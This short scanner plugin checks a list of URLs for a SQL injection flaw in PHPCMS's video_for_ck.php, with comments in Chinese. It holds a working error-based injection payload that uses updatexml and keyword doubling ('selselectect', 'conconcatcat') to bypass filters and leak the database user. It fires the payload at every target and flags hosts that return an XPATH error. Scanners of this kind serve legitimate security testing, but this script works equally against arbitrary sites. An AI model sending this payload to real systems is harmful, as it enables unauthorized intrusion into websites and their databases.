#request urls = array
#define payload = /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=11&title=12&description=%E9%8C%A6&keywords=,updatexml(1,conconcatcat(0x3a,(selselectect user())),1),1,1,1,1)%23
#define bug = XPATH syntax error:
#define info = /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=11&title=12&description=%E9%8C%A6&keywords=,upda|存在phpcms video_for_ck.php sql注入

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
